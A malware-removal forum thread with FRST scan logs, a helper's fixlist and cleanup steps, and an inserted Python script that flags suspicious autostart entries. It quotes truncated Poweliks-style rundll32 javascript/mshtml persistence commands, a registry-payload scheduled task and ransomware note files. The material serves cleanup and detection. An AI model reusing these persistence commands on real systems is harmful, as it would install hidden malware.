Error: (07/28/2015 03:20:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Microsoft.BingTravel_8wekyb3d8bbwe!AppexTravel-2144927148
 
Error: (07/28/2015 02:58:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20911a2c01d0c96649b3afff4294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe96c3afc4-355a-11e5-8187-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
 
CodeIntegrity Error:
===================================
  Date: 2015-07-28 16:18:41.402
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 15:30:30.306
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 15:21:42.300
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:44:43.259
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:35:12.748
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:15:16.739
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 20:46:48.220
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 19:37:12.957
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 19:29:33.384
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 08:13:30.141
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: AMD E-300 APU with Radeon™ HD Graphics
Percentage of memory in use: 34%
Total physical RAM: 3682.26 MB
Available physical RAM: 2398 MB
Total Virtual: 4386.26 MB
Available Virtual: 2443.11 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:273.49 GB) (Free:230.16 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive d: (RECOVERY) (Fixed) (Total:23.39 GB) (Free:2.82 GB) NTFS ==>[system with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 1E1F4777)
 
Partition: GPT Partition Type.
 
==================== End of log ============================
 

  • 0


#2
Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts
Greetings,

Welcome to Geeks to Go--the friendliest online community dedicated to the sole goal of helping people from all around the world! :) I am Pyxis and I will be assisting you. As such, I would like to stress the following reminders:
  • It is important that you do not install anything unless asked while the process is ongoing. Doing so may hinder or even complicate the cleaning of your system. You will get the chance to install things as you would like after the process has been completed.
  • Ensure you take extra caution to precisely follow my instructions. Please only use the tools I have asked you to. The instructions for your computer are unique and should therefore only apply to your system.
  • Since the cleaning process is quite delicate, your timely response is crucial. Topics are marked inactive and thus closed within 3 full days of no activity. If you deem I have overlooked your thread--which is in a matter of more than 48 hours--please send me a PM and I will get back to you shortly.
I hope you keep in mind these reminders. Let's get to work! :thumbsup:
  • Step 1

    Copy and paste the following into Notepad and save as fixlist.txt to your desktop:
    CloseProcesses:
    EmptyTemp:
    
    HKLM-x32\...\Run: [{b090579d-244c-e682-7cd6-e6daa5c7aff0}] => "C:\ProgramData\Microsoft\{b090579d-244c-e682-7cd6-e6daa5c7aff0}\{b090579d-244c-e682-7cd6-e6daa5c7aff0}.exe"
    HKLM Group Policy restriction on software: C:\Program Files\Symantec <====== ATTENTION
    HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
    HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
    HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\Run: [ivijios] => rundll32 "C:\Users\Richie\AppData\Local\ivijios.dll",ivijios <===== ATTENTION
    HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{eedc51b2-9627-4964-8aab-3c12119ef845} <======= ATTENTION (Policy restriction on IP)
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
    HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
    HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
    SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
    SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
    SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...54371-11896-2/4?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
    SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
    SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
    SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...54371-11896-2/4?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
    SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
    SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
    SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
    SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
    SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...54371-11896-2/4?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
    2015-07-17 10:59 - 2015-07-17 10:59 - 00266240 _____ C:\Users\Richie\AppData\Roaming\7afd7914.dll
    2015-07-14 08:21 - 2015-07-20 08:35 - 00000000 ___HD C:\7afd7914
    2015-07-13 15:33 - 2015-07-13 15:33 - 00000000 ____D C:\ProgramData\{18165758-115C-4DC0-9EC2-FF89F725767F}
    2015-07-10 15:34 - 2015-07-28 13:17 - 00000000 ____D C:\Users\Richie\AppData\Local\{beedd195-7534-c93e-bcaf-0a2671d4725d}
    2015-07-10 15:34 - 2015-07-10 15:34 - 00000000 ___HD C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}
    2015-07-28 13:17 - 2014-12-06 22:56 - 00000000 ____D C:\ProgramData\LeboBukmo
    2015-07-28 13:17 - 2014-11-26 00:56 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate
    2015-07-28 13:17 - 2014-11-21 00:32 - 00000000 ____D C:\ProgramData\IomuTdilf
    2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate7
    2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\XesviPteyu
    2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\IojdOnyo
    2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\XiboHbik
    2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\EoxoKazxa
    2015-07-28 13:17 - 2014-11-07 20:16 - 00000000 ____D C:\ProgramData\RogoLatk
    2015-07-28 13:17 - 2014-11-07 20:15 - 00000000 ____D C:\ProgramData\BoweCpeb
    2015-07-28 11:47 - 2014-11-05 01:20 - 00000000 ____D C:\ProgramData\HezagTonag
    2015-07-10 14:50 - 2013-06-06 20:07 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shopping and Services
    2015-07-10 14:50 - 2012-08-17 14:05 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Security and Protection
    2015-07-08 07:59 - 2014-12-13 10:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Ecidcuo
    2015-07-08 07:59 - 2014-12-06 22:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Evcoguyl
    2015-07-08 07:59 - 2014-11-21 00:33 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Urablax
    2015-07-17 10:59 - 2015-07-17 10:59 - 0266240 _____ () C:\Users\Richie\AppData\Roaming\7afd7914.dll
    2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
    2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
    2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.URL
    2015-01-29 00:25 - 2015-01-29 00:25 - 0008528 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.HTML
    2015-01-29 00:25 - 2015-01-29 00:25 - 0045533 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.PNG
    2015-01-29 00:25 - 2015-01-29 00:25 - 0004204 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.TXT
    2015-01-29 00:25 - 2015-01-29 00:25 - 0000272 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.URL
    2014-11-11 19:24 - 2014-11-11 19:24 - 0000448 ____H () C:\Users\Richie\AppData\Roaming\麽鎒駓覜
    2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.HTML
    2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.TXT
    2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.URL
    2015-01-29 00:24 - 2015-01-29 00:24 - 0008528 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.HTML
    2015-01-29 00:24 - 2015-01-29 00:24 - 0045533 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.PNG
    2015-01-29 00:24 - 2015-01-29 00:24 - 0004204 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.TXT
    2015-01-29 00:24 - 2015-01-29 00:24 - 0000272 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.URL
    2014-11-11 19:24 - 2015-01-28 23:26 - 0000664 _____ () C:\ProgramData\@system.temp
    2014-11-11 19:25 - 2015-01-28 23:27 - 0000400 ____H () C:\ProgramData\@system3.att
    CustomCLSID: HKU\S-1-5-21-2321640021-2341620851-140482586-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
    Task: {42606C78-3E7A-474E-9FB5-D30D039784CB} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
    Task: {F5715D4F-B262-4590-8487-ACEB028F19D5} - System32\Tasks\autochk => C:\Users\Richie\AppData\Roaming\Microsoft\Windows\IEUpdate\autochk.exe <==== ATTENTION
    C:\users\richie\appdata\roaming\microsoft\windows\ieupdate
    C:\users\richie\appdata\local\svcxdcl32.exe
    HKLM\...\StartupApproved\Run32: => "{b090579d-244c-e682-7cd6-e6daa5c7aff0}"
    HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "{beedd195-7534-c93e-bcaf-0a2671d4725d}"
    HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "Svc2dll"
    
    RemoveProxy:
    CMD: bitsadmin /reset /allusers
    CMD: netsh advfirewall reset
    CMD: netsh advfirewall set allprofiles state ON
    • Run your copy of FRST. It is important to ensure it is located on your desktop.
    • Press the Fix button.
    • It will produce a log (fixlog.txt) once done.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
  • Step 2

    Open System Configuration by following the steps below.
    • Press the Windows and R buttons together. The Run prompt should appear.
    • Type in msconfig and press OK.
    • Navigate to the Startup tab > Enable All > Apply > OK.
    • You will be prompted to restart. Do not allow it by choosing Exit without restart.
  • Step 3

    Run your copy of FRST by double-clicking it.
    • Put a check on Addition.
    • Press the Scan button after.
    • It will produce FRST.txt and Addition.txt on your desktop once done.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the logs in your next reply.
  • Logs to Post

    In summary of the above, I will need you to post the following log(s):
    • Addition.txt (Farbar Recovery Scan Tool)
    • FRST.txt (Farbar Recovery Scan Tool)
    • fixlog.txt (Farbar Recovery Scan Tool)

  • 0
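
The fixlist in post #2 removes a few recurring kinds of autostart entry: rundll32 given a javascript: URL (the lines FRST marks as Poweliks), rundll32 loading a DLL from the user profile, executables in GUID-named folders, and a scheduled task pointing into AppData. The script below is an added example, not part of the thread and not FRST's own logic, that flags those shapes in FRST-style lines; the rule names, the `triage` function and the sample lines (constructed, modeled on the entries above) are assumptions.

```python
import re
from dataclasses import dataclass

# FRST prints "<location> => <command>" (or "->" for CustomCLSID entries).
SEPARATOR = re.compile(r"\s(?:=>|->)\s")

# (rule name, optional pattern on the location, pattern on the command).
# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("rundll32-script-protocol", None,
     re.compile(r'^rundll32(\.exe)?\s+javascript:.*mshtml,\s*RunHTMLApplication', re.I)),
    ("rundll32-user-profile-dll", None,
     re.compile(r'^rundll32(\.exe)?\s+"?[A-Z]:\\Users\\[^\\]+\\AppData\\[^"]+\.dll', re.I)),
    ("exe-in-guid-folder", None,
     re.compile(r'^"?[A-Z]:\\(?:ProgramData|Users\\[^\\]+\\AppData)\\.*'
                r'\{[0-9a-f-]{36}\}.*\.exe', re.I)),
    ("task-exe-in-user-profile", re.compile(r'^Task:', re.I),
     re.compile(r'^"?[A-Z]:\\Users\\[^\\]+\\AppData\\.*\.exe', re.I)),
]


@dataclass
class Finding:
    line_no: int
    rule: str
    location: str
    command: str


def split_entry(line):
    """Split an FRST line into (location, command); command is '' if absent."""
    parts = SEPARATOR.split(line, maxsplit=1)
    return (parts[0], parts[1]) if len(parts) == 2 else (line, "")


def triage(lines):
    """Return a Finding for every rule that matches an autostart line."""
    findings = []
    for line_no, raw in enumerate(lines, 1):
        location, command = split_entry(raw.strip())
        if not command:  # section headers, file listings, blank lines
            continue
        for rule, loc_re, cmd_re in RULES:
            if loc_re is not None and not loc_re.search(location):
                continue
            if cmd_re.search(command):
                findings.append(Finding(line_no, rule, location, command))
    return findings


# Constructed sample lines (placeholder SIDs, GUIDs and file names).
SAMPLE = [
    r'HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe',
    r'HKU\S-1-5-21-0-0-0-1001\...\Run: [example] => rundll32 "C:\Users\User\AppData\Local\example.dll",example',
    r'CustomCLSID: HKU\S-1-5-21-0-0-0-1001_Classes\CLSID\{00000000-0000-0000-0000-000000000000}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("<truncated>")',
    r'Task: {00000000-0000-0000-0000-000000000001} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write(<truncated>)',
    r'Task: {00000000-0000-0000-0000-000000000002} - System32\Tasks\autochk => C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\autochk.exe',
    r'HKLM-x32\...\Run: [{11111111-2222-3333-4444-555555555555}] => "C:\ProgramData\Microsoft\{11111111-2222-3333-4444-555555555555}\{11111111-2222-3333-4444-555555555555}.exe"',
    r'Task: {00000000-0000-0000-0000-000000000003} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)',
    '==================== Scheduled Tasks (Whitelisted) =============',
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"line {f.line_no}: {f.rule}: {f.location}")
```

A match is a prompt for review, not a verdict: the task named GoogleUpdater is flagged because of what it launches, while the GoogleUpdateTaskMachineCore task that runs from Program Files is not.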

#3
smwifey

    Member

  • Topic Starter
  • Member
  • PipPip
  • 85 posts

All steps completed and here are the logs.

 

Thanks for the help

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:28-07-2015
Ran by Richie (2015-07-29 20:49:00)
Running from C:\Users\Richie\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2321640021-2341620851-140482586-500 - Administrator - Disabled)
Guest (S-1-5-21-2321640021-2341620851-140482586-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2321640021-2341620851-140482586-1004 - Limited - Enabled)
Richie (S-1-5-21-2321640021-2341620851-140482586-1002 - Administrator - Enabled) => C:\Users\Richie
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avira Antivirus (Enabled - Out of date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Out of date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4 Elements II (x32 Version: 2.2.0.98 - WildTangent) Hidden
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.5.635 - Adobe Systems, Inc.)
AMD Catalyst Install Manager (HKLM\...\{63ADEC24-A374-80A8-E89B-BE401C787F75}) (Version: 8.0.881.0 - Advanced Micro Devices, Inc.)
AMD VISION Engine Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
Avira (HKLM-x32\...\{8467e01f-0496-42ce-b247-88ef205b4880}) (Version: 1.1.40.29239 - Avira Operations GmbH & Co. KG)
Avira (x32 Version: 1.1.40.29239 - Avira Operations GmbH & Co. KG) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.12.408 - Avira Operations GmbH & Co. KG)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Build-a-lot 4 - Power Source (x32 Version: 2.2.0.98 - WildTangent) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1.5407 - CyberLink Corp.)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.1.1926 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
FATE: The Cursed King (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
FlatOut 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 44.0.2403.107 - Google Inc.)
Google Update Helper (x32 Version: 1.3.28.1 - Google Inc.) Hidden
Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP Documentation (HKLM-x32\...\{AE986BF5-B6E3-4F8D-B412-A3DD90DF5146}) (Version: 1.1.1.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.3.0 - WildTangent)
HP MyRoom (HKLM-x32\...\{9C35EDE5-4B0F-45E7-A438-314BA889948E}) (Version: 9.0.0.0 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{4ED7050C-9332-4FB2-AB07-E94F25A53D39}) (Version: 3.0.3 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{675D093B-815D-47FD-AB2C-192EC751E8E2}) (Version: 4.6.10.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}) (Version: 7.4.45.4 - Hewlett-Packard Company)
HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)
HP Wireless Button Driver (HKLM-x32\...\{941DE69D-6CEE-4171-8F1F-3D7E352AA498}) (Version: 1.0.6.1 - Hewlett-Packard Company)
iscsicli (HKLM\...\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb) (Version:  - )
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mahjongg Dimensions Deluxe: Tiles in Time (x32 Version: 2.2.0.98 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Mortimer Beckett and the Crimson Thief Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Qualcomm Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Qualcomm Atheros)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6662 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.8400.29025 - Realtek Semiconductor Corp.)
Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.6.1.3 - Synaptics Incorporated)
Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Vacation Quest™ - Australia (x32 Version: 2.2.0.98 - WildTangent) Hidden
